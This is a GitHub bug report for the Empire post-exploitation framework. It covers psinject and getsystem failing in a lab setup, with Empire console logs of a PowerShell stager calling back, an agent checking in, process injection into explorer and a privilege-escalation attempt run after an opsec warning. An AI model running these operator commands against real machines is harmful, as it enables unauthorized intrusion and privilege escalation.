Empire icon indicating copy to clipboard operation
Empire copied to clipboard

Published 20 hours ago verified publisher icon EmpireProject

Process injection(psinject not working)

Open CptOfEvilMinions opened this issue 5 years ago • 1 comments

Empire Version

  • 2.5

OS Information (Linux flavor, Python version)

  • Linux KaliLinuxVM 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 GNU/Linux
  • Python 2.7.16rc1
  • Microsoft Windows 10 Education - Version 10.0.15063 Build 15063
  • Powershell 5.1 - Build 15063 revision 1689

Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Empire agent running as Administrator cannot inject into another process with psinject. Furthermore, if I try to obtain SYSTEM it fails as well.

Screenshot of error, embedded text output, or Pastebin link to the error

Process injection

(Empire: stager/multi/launcher) > [*] Sending POWERSHELL stager (stage 1) to 192.168.228.131
[*] New agent 5HA8W4T6 checked in
[+] Initial agent 5HA8W4T6 from 192.168.228.131 now active (Slack)
[*] Sending agent (stage 2) to 5HA8W4T6 at 192.168.228.131

(Empire: stager/multi/launcher) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 5HA8W4T6 ps 192.168.228.131 DESKTOP-P8PBRLM   *DESKTOP-P8PBRLM\Sherlo powershell         5768   5/0.0    2019-03-27 12:59:11

(Empire: agents) > interact 5HA8W4T6
(Empire: 5HA8W4T6) > psinject http80 explorer
\[*] Tasked 5HA8W4T6 to run TASK_CMD_JOB
[*] Agent 5HA8W4T6 tasked with task ID 1
[*] Tasked agent 5HA8W4T6 to run module powershell/management/psinject
(Empire: 5HA8W4T6) > [*] Agent 5HA8W4T6 returned results.
Job started: H6F8Y4
[*] Valid results returned by 192.168.228.131
(Empire: 5HA8W4T6) >

Get-System

(Empire: 5HA8W4T6) > usemodule privesc/getsystem*
(Empire: powershell/privesc/getsystem) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 5HA8W4T6 to run TASK_CMD_WAIT
[*] Agent 5HA8W4T6 tasked with task ID 2
[*] Tasked agent 5HA8W4T6 to run module powershell/privesc/getsystem
(Empire: powershell/privesc/getsystem) > [*] Agent 5HA8W4T6 returned results.
error running command: Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
[*] Valid results returned by 192.168.228.131

(Empire: powershell/privesc/getsystem) >

Any additional information

Empire HTTP listener - no encryption Defender is turned off on Windows

Started a Powershell instance as Administrator to execute the Empire multi/launcher payload.

CptOfEvilMinions avatar Mar 27 '19 17:03 CptOfEvilMinions

Fixed in 3.0-Beta branch(883ee661d1bbc72920102054e8bba00515bff9e0)

CptOfEvilMinions avatar Mar 28 '19 15:03 CptOfEvilMinions